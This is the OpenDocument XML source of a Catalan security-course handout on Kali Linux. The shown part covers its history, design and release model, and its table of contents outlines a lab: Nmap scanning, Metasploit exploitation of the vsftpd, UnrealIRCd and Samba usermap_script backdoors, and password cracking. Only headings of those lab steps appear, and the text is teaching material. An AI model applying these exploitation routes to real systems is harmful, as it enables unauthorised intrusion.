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12C000000987BF4BC47.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/1000000100000AF0000005F0AE369163.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/10000001000004BC000003222B5D4C9B.png" manifest:media-type="image/png"/>
  <manifest:file-entry manifest:full-path="Pictures/100000000000010D0000004585066606.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automatic-styles>
    <style:style style:name="Table1" style:family="table">
      <style:table-properties style:width="17cm" style:rel-width="100%" table:align="center"/>
    </style:style>
    <style:style style:name="Table1.A" style:family="table-column">
      <style:table-column-properties style:column-width="5.667cm" style:rel-column-width="21845*"/>
    </style:style>
    <style:style style:name="Table1.B" style:family="table-column">
      <style:table-column-properties style:column-width="11.333cm" style:rel-column-width="43690*"/>
    </style:style>
    <style:style style:name="Table1.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.101cm" fo:border="0.75pt solid #000000"/>
    </style:style>
    <style:style style:name="Table2" style:family="table">
      <style:table-properties style:width="17cm" style:rel-width="100%" table:align="center"/>
    </style:style>
    <style:style style:name="Table2.A" style:family="table-column">
      <style:table-column-properties style:column-width="5.313cm" style:rel-column-width="20479*"/>
    </style:style>
    <style:style style:name="Table2.B" style:family="table-column">
      <style:table-column-properties style:column-width="3.187cm" style:rel-column-width="12287*"/>
    </style:style>
    <style:style style:name="Table2.C" style:family="table-column">
      <style:table-column-properties style:column-width="8.5cm" style:rel-column-width="32767*"/>
    </style:style>
    <style:style style:name="Table2.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.101cm" fo:border="0.75pt solid #000000"/>
    </style:style>
    <style:style style:name="Table3" style:family="table">
      <style:table-properties style:width="17cm" style:rel-width="100%" table:align="center"/>
    </style:style>
    <style:style style:name="Table3.A" style:family="table-column">
      <style:table-column-properties style:column-width="4.001cm" style:rel-column-width="15420*"/>
    </style:style>
    <style:style style:name="Table3.B" style:family="table-column">
      <style:table-column-properties style:column-width="3cm" style:rel-column-width="11565*"/>
    </style:style>
    <style:style style:name="Table3.D" style:family="table-column">
      <style:table-column-properties style:column-width="6.001cm" style:rel-column-width="23130*"/>
    </style:style>
    <style:style style:name="Table3.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.101cm" fo:border="0.75pt solid #000000"/>
    </style:style>
    <style:style style:name="Table4" style:family="table">
      <style:table-properties style:width="17cm" style:rel-width="100%" table:align="center"/>
    </style:style>
    <style:style style:name="Table4.A" style:family="table-column">
      <style:table-column-properties style:column-width="5.667cm" style:rel-column-width="21845*"/>
    </style:style>
    <style:style style:name="Table4.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.101cm" fo:border="0.75pt solid #000000"/>
    </style:style>
    <style:style style:name="Table5" style:family="table">
      <style:table-properties style:width="17cm" style:rel-width="100%" table:align="center"/>
    </style:style>
    <style:style style:name="Table5.A" style:family="table-column">
      <style:table-column-properties style:column-width="3.923cm" style:rel-column-width="15123*"/>
    </style:style>
    <style:style style:name="Table5.B" style:family="table-column">
      <style:table-column-properties style:column-width="6.539cm" style:rel-column-width="25205*"/>
    </style:style>
    <style:style style:name="Table5.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.101cm" fo:border="0.75pt solid #000000"/>
    </style:style>
    <style:style style:name="Table6" style:family="table">
      <style:table-properties style:width="17cm" table:align="margins"/>
    </style:style>
    <style:style style:name="Table6.A" style:family="table-column">
      <style:table-column-properties style:column-width="8.5cm" style:rel-column-width="32767*"/>
    </style:style>
    <style:style style:name="Table6.B" style:family="table-column">
      <style:table-column-properties style:column-width="8.5cm" style:rel-column-width="32768*"/>
    </style:style>
    <style:style style:name="Table6.A1" style:family="table-cell">
      <style:table-cell-properties fo:padding="0.101cm" fo:border="0.75pt solid #000000"/>
    </style:style>
    <style:style style:name="P1" style:family="paragraph" style:parent-style-name="Contents_20_1">
      <style:paragraph-properties>
        <style:tab-stops>
          <style:tab-stop style:position="16.999cm" style:type="right" style:leader-style="dotted" style:leader-text="."/>
        </style:tab-stops>
      </style:paragraph-properties>
    </style:style>
    <style:style style:name="P2" style:family="paragraph" style:parent-style-name="Contents_20_2">
      <style:paragraph-properties>
        <style:tab-stops>
          <style:tab-stop style:position="16.499cm" style:type="right" style:leader-style="dotted" style:leader-text="."/>
        </style:tab-stops>
      </style:paragraph-properties>
    </style:style>
    <style:style style:name="P3" style:family="paragraph" style:parent-style-name="Contents_20_3">
      <style:paragraph-properties>
        <style:tab-stops>
          <style:tab-stop style:position="16cm" style:type="right" style:leader-style="dotted" style:leader-text="."/>
        </style:tab-stops>
      </style:paragraph-properties>
    </style:style>
    <style:style style:name="P4" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L1">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P5" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:text-properties fo:font-weight="bold" style:font-weight-asian="bold" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="P6" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L2">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P7" style:family="paragraph" style:parent-style-name="First_20_paragraph">
      <style:text-properties fo:font-weight="bold" style:font-weight-asian="bold" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="P8" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L3">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P9" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L4">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P10" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L5">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P11" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L6">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P12" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L7">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P13" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L8">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P14" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L9">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P15" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L10">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P16" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L11">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P17" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L12">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P18" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L13">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P19" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L14">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P20" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L15">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P21" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L16">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P22" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L17">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P23" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L18">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P24" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L19">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="P25" style:family="paragraph" style:parent-style-name="Figure_20_Index_20_1">
      <style:paragraph-properties>
        <style:tab-stops>
          <style:tab-stop style:position="16.999cm" style:type="right" style:leader-style="dotted" style:leader-text="."/>
        </style:tab-stops>
      </style:paragraph-properties>
    </style:style>
    <style:style style:name="P26" style:family="paragraph" style:parent-style-name="Text_20_body" style:list-style-name="L20">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>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1" style:family="graphic" style:parent-style-name="Graphics">
      <style:graphic-properties style:vertical-pos="top" style:vertical-rel="baseli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4">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loext:num-list-format="%1%."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Kali Linux</text:p>
      <text:table-of-content text:style-name="Sect1" text:name="Table of Contents1">
        <text:table-of-content-source text:outline-level="3">
          <text:index-title-template text:style-name="Contents_20_Heading">Índex</text:index-title-template>
          <text:table-of-content-entry-template text:outline-level="1" text:style-name="Contents_20_1">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3" text:style-name="Contents_20_3">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4" text:style-name="Contents_20_4">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5" text:style-name="Contents_20_5">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6" text:style-name="Contents_20_6">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7" text:style-name="Contents_20_7">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8" text:style-name="Contents_20_8">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9" text:style-name="Contents_20_9">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entry-template text:outline-level="10" text:style-name="Contents_20_10">
            <text:index-entry-link-start text:style-name="Internet_20_link"/>
            <text:index-entry-chapter/>
            <text:index-entry-text/>
            <text:index-entry-link-end/>
            <text:index-entry-tab-stop style:type="right" style:leader-char="."/>
            <text:index-entry-link-start text:style-name="Internet_20_link"/>
            <text:index-entry-page-number/>
            <text:index-entry-link-end/>
          </text:table-of-content-entry-template>
        </text:table-of-content-source>
        <text:index-body>
          <text:index-title text:style-name="Sect1" text:name="Table of Contents1_Head">
            <text:p text:style-name="Contents_20_Heading">Índex</text:p>
          </text:index-title>
          <text:p text:style-name="P1"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1904_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Kali Linux</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1904_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">3</text:a></text:p>
          <text:p text:style-name="P1"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1906_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">1. La distro</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1906_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">3</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1908_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">1.1. Origen i història</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1908_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">3</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1910_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">1.2. Filosofia de disseny</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1910_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">3</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1912_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">1.3. Model de llançament</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1912_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">4</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1914_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">1.4. Formats de distribució</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1914_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">4</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1916_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">1.5. Metapaquets</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1916_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">4</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1918_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">1.6. Entorn d’escriptori</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1918_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">4</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1920_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">1.7. Eines</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1920_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">5</text:a></text:p>
          <text:p text:style-name="P1"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1922_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2. Pràctica: Introducció al Pentesting amb Kali Linux</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1922_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">6</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1924_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.1. Descripció</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1924_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">6</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1926_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.2. Objectius d’aprenentatge</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1926_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">6</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1928_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.3. Rúbrica d’avaluació</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1928_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">7</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1930_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.4. Possibles ampliacions</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1930_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">7</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1932_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.5. Arquitectura del laboratori</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1932_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">7</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1934_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.6. Descàrrega de les màquines</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1934_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">8</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1936_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.7. Fase 1 — Reconeixement i escaneig (Nmap)</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1936_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">8</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1938_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Serveis crítics a explotar prioritàriament</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1938_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">11</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1940_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Detalls que criden l’atenció</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1940_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">12</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1942_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.8. Fase 2 — Identifica vulnerabilitats</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1942_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">12</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1944_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.9. Fase 3 — Explota amb Metasploit</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1944_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">13</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1946_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Què és un exploit?</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1946_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">13</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1948_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Alternativa 1: vsftpd backdoor</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1948_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">14</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1950_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Alternativa 2: UnrealIRCd backdoor</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1950_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">15</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1952_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Alternativa 3: Samba usermap_script</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1952_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">17</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1954_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.10. Fase 4 — Crackeja contrasenyes</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1954_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">18</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1956_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">2.11. Fase 5 — Elabora l’informe</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1956_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">20</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1958_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Portada i dades generals</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1958_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">20</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1960_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Resum executiu</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1960_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">20</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1962_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Metodologia</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1962_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">20</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1964_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Troballes</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1964_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">20</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1966_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Procés d’explotació pas a pas</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1966_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">21</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1968_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Recomanacions de mitigació</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1968_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">21</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1970_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link"><text:soft-page-break/>Conclusions</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1970_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">21</text:a></text:p>
          <text:p text:style-name="P3"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1972_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Exemple d’informe</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1972_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">21</text:a></text:p>
          <text:p text:style-name="P2"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1974_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">Índex de figures</text:a><text:tab/><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1974_1837196447" text:style-name="Internet_20_link" text:visited-style-name="Internet_20_link">22</text:a></text:p>
        </text:index-body>
      </text:table-of-content>
      <text:p text:style-name="SaltDePagina"/>
      <text:h text:style-name="Heading_20_1" text:outline-level="1"><text:bookmark-start text:name="kali-linux"/><text:bookmark-start text:name="__RefHeading___Toc1904_1837196447"/>Kali Linux<text:bookmark-end text:name="kali-linux"/><text:bookmark-end text:name="__RefHeading___Toc1904_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph"><text:span text:style-name="T1">Cicle formatiu:</text:span> CFGM Sistemes Microinformàtics i Xarxes (SMX) / CFGS Administració de sistemes informàtics en xarxa (ASIX)</text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="T1">Mòdul:</text:span> 0226 - Seguretat informàtica / 0378 - Seguretat i alta disponibilitat</text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="T1">Kali Linux</text:span> és una distribució de Linux basada en <text:span text:style-name="T1">Debian</text:span>, mantinguda per <text:span text:style-name="T1">Offensive Security</text:span> (ara OffSec), dissenyada específicament per a auditories de seguretat, pentesting, forense digital i enginyeria inversa. Kali no és “una distribució amb virus”; és un <text:span text:style-name="T1">conjunt d’eines legítimes</text:span> que qualsevol administrador de xarxes hauria de conèixer per entendre com pensa un atacant.</text:p>
      <text:p text:style-name="FigureWithCaption"><draw:frame draw:style-name="fr1" draw:name="img1" text:anchor-type="as-char" svg:width="3cm" svg:height="1.52cm" draw:z-index="44"><draw:image xlink:href="Pictures/100000010000012C000000987BF4BC47.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/></draw:frame></text:p>
      <text:p text:style-name="FigureCaption"><text:bookmark-start text:name="__RefHeading___Toc1976_1837196447"/>Figura 1: Kali Linux logo<text:bookmark-end text:name="__RefHeading___Toc1976_1837196447"/></text:p>
      <text:h text:style-name="Heading_20_1" text:outline-level="1"><text:bookmark-start text:name="la-distro"/><text:bookmark-start text:name="__RefHeading___Toc1906_1837196447"/>1. La distro<text:bookmark-end text:name="la-distro"/><text:bookmark-end text:name="__RefHeading___Toc1906_1837196447"/></text:h>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="origen-i-història"/><text:bookmark-start text:name="__RefHeading___Toc1908_1837196447"/>1.1. Origen i història<text:bookmark-end text:name="origen-i-història"/><text:bookmark-end text:name="__RefHeading___Toc1908_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Va néixer com a successora de <text:span text:style-name="T1">BackTrack Linux</text:span>, que al seu torn combinava dues distribucions anteriors (WHAX i Auditor Security Collection). Kali es va llançar el <text:span text:style-name="T1">2013</text:span>, reconstruïda des de zero sobre Debian (en comptes d’Ubuntu, com feia BackTrack), amb l’objectiu de tenir una base més estable i un sistema de paquets més net i mantenible a llarg termini.</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="filosofia-de-disseny"/><text:bookmark-start text:name="__RefHeading___Toc1910_1837196447"/>1.2. Filosofia de disseny<text:bookmark-end text:name="filosofia-de-disseny"/><text:bookmark-end text:name="__RefHeading___Toc1910_1837196447"/></text:h>
      <text:list text:style-name="L1">
        <text:list-item>
          <text:p text:style-name="P4"><text:span text:style-name="T1">FHS compliant</text:span> — segueix l’estàndard de jerarquia de fitxers de Linux, cosa que BackTrack no feia</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:span text:style-name="T1">Dipòsit Git únic</text:span> — tots els paquets es gestionen des d’un dipòsit centralitzat i signat</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:span text:style-name="T1">Personalització total</text:span> — pensada per compilar-se a mida (ISO personalitzades amb <text:span text:style-name="CodiInline">live-build</text:span>)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P4"><text:span text:style-name="T1">Compatibilitat ARM</text:span> — funciona en Raspberry Pi i molts altres dispositius ARM, molt útil per a pentesting físic amb maquinari petit</text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="model-de-llançament"/><text:bookmark-start text:name="__RefHeading___Toc1912_1837196447"/><text:soft-page-break/>1.3. Model de llançament<text:bookmark-end text:name="model-de-llançament"/><text:bookmark-end text:name="__RefHeading___Toc1912_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Des de fa anys Kali segueix un model <text:span text:style-name="T1">rolling release</text:span>, amb actualitzacions constants, més una versió “punt” trimestral (per exemple 2026.x) que serveix de fotografia estable per descarregar l’ISO.</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="formats-de-distribució"/><text:bookmark-start text:name="__RefHeading___Toc1914_1837196447"/>1.4. Formats de distribució<text:bookmark-end text:name="formats-de-distribució"/><text:bookmark-end text:name="__RefHeading___Toc1914_1837196447"/></text:h>
      <table:table table:name="Table1" table:style-name="Table1">
        <table:table-column table:style-name="Table1.A"/>
        <table:table-column table:style-name="Table1.B"/>
        <table:table-header-rows>
          <table:table-row>
            <table:table-cell table:style-name="Table1.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Format</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table1.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Ús típic</text:p>
            </table:table-cell>
          </table:table-row>
        </table:table-header-rows>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">ISO instal·lable</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Instal·lació completa en disc</text:p>
          </table:table-cell>
        </table:table-row>
